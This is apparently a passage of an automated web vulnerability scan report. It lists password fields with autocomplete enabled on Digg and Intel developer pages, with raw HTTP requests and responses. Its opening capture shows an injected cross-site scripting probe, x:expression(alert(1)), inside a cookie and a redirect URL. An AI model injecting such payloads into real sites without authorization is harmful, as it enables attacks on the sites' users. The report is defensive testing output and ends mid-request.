Accept-Encoding: gzip, deflate
Host: www91.intel.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=78E12C4CBC31892852D8659ED77D7E3B.node7IPR; wa_visitId=%7Bf2a84205-6e62-e72c-945c-67c55cb850af%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957489568; s_lv_s=First%20Visit; cf=1; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:57:40 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A7000A05012477-60000107200B4F69[CE]; Expires=Fri, 5 Feb 2016 01:57:40 GMT; Domain=.intel.com; Path=/
Location: http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078?AQB=1&pccr=true&vidn=26A7000A05012477-60000107200B4F69&&ndh=1&t=5/1/2011%2019%3A58%3A9%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5%2Cevent9&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=First%20Visit&v16=First%20Visit&c17=new&v17=new&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.5&v=Y&k=Y&bw=1172&bh=684&ct=lan&hp=N&AQE=1
X-C: ms-4.3.1
Expires: Sat, 05 Feb 2011 01:57:40 GMT
Last-Modified: Mon, 07 Feb 2011 01:57:40 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www57
Content-Length: 0
Content-Type: text/plain


13. Password field with autocomplete enabled  previous  next
There are 29 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


13.1. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL:
  • http://digg.com/submit
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:52:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Mon, 07-Feb-2011 01:52:59 GMT; path=/; domain=digg.com
Set-Cookie: d=93a16908ae0173f410bdf4843d598fa77820d1fc451b8618b115021fc5586e1a; expires=Fri, 05-Feb-2021 12:00:39 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21162 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7632

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

13.2. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL:
  • http://digg.com/submit?url=
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /submit?url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sun, 06-Feb-2011 23:17:38 GMT; path=/; domain=digg.com
Set-Cookie: d=15436670eec4b706dbd3007684ea2ebb76af60eb4cc681ce1bc0e799ee3bcc18; expires=Fri, 05-Feb-2021 09:25:18 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21375 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

13.3. http://software.intel.com/en-us/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
Date: Sat, 05 Feb 2011 23:21:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=80d3b7dbc1c511eec9e30e6313957d55; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 77398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<he
...[SNIP]...
<div class="mod-box-220 blue-top login">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/" id="user-login" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
</div> <input type="password" name="txtPassword" /><br />
...[SNIP]...

13.4. http://software.intel.com/en-us/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/?iid=subhdr+devctr_sw
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/?iid=subhdr+devctr_sw HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
Date: Sat, 05 Feb 2011 23:21:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=4ae66bab79eb08b3fffa4262b94cdf90; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 77482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<he
...[SNIP]...
<div class="mod-box-220 blue-top login">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/?iid=subhdr+devctr_sw" id="user-login" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
</div> <input type="password" name="txtPassword" /><br />
...[SNIP]...

13.5. http://software.intel.com/en-us/articles/intel-cloud-builders-overview/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/articles/intel-cloud-builders-overview/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/articles/intel-cloud-builders-overview
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/articles/intel-cloud-builders-overview/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:22:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=9b9329ab03330eb2995d6e0b7cd5ee03; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 44663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<div class="boxBody">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/articles/intel-cloud-builders-overview" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
<div class="value"><input id="txtPassword" name="txtPassword" class="login" size="12" type="password" /></div>
...[SNIP]...

13.6. http://software.intel.com/en-us/blogs/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/blogs/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/blogs
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/blogs/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=b4b0122969a1cad358c7d154e5df9808; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 52451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<div class="boxBody">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/blogs" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
<div class="value"><input id="txtPassword" name="txtPassword" class="login" size="12" type="password" /></div>
...[SNIP]...

13.7. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/01/31/everyone-has-a-dream/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/blogs/2011/01/31/everyone-has-a-dream/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=c6f20ace22b45018ab76495ba5248e67; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 42232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<div class="boxBody">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
<div class="value"><input id="txtPassword" name="txtPassword" class="login" size="12" type="password" /></div>
...[SNIP]...

13.8. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=5835ba1bbad9f78b6863c69132a212a2; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<div class="boxBody">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
<div class="value"><input id="txtPassword" name="txtPassword" class="login" size="12" type="password" /></div>
...[SNIP]...

13.9. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=bdd17db69f4af41eb346e39496779504; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<div class="boxBody">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
<div class="value"><input id="txtPassword" name="txtPassword" class="login" size="12" type="password" /></div>
...[SNIP]...

13.10. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=a4e51d252757c97212e7d2d038ee7a76; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 38246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<div class="boxBody">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
<div class="value"><input id="txtPassword" name="txtPassword" class="login" size="12" type="password" /></div>
...[SNIP]...

13.11. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=23acb205107344b897198d1b0053cbc6; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<div class="boxBody">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
<div class="value"><input id="txtPassword" name="txtPassword" class="login" size="12" type="password" /></div>
...[SNIP]...

13.12. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=3132f08882351b5b69f11ba86bbd295a; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<div class="boxBody">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
<div class="value"><input id="txtPassword" name="txtPassword" class="login" size="12" type="password" /></div>
...[SNIP]...

13.13. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=d05389110c2d2011353f05e29b09f232; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<div class="boxBody">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
<div class="value"><input id="txtPassword" name="txtPassword" class="login" size="12" type="password" /></div>
...[SNIP]...

13.14. http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:40 GMT
Content-Length: 20519
Connection: close
Set-Cookie: PHPSESSID=a638f3cc0588735e2cef74d00d31654d; path=/; domain=intel.com
Set-Cookie: loginpt=0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<div class="boxBody">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
<div class="value"><input id="txtPassword" name="txtPassword" class="login" size="12" type="password" /></div>
...[SNIP]...

13.15. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
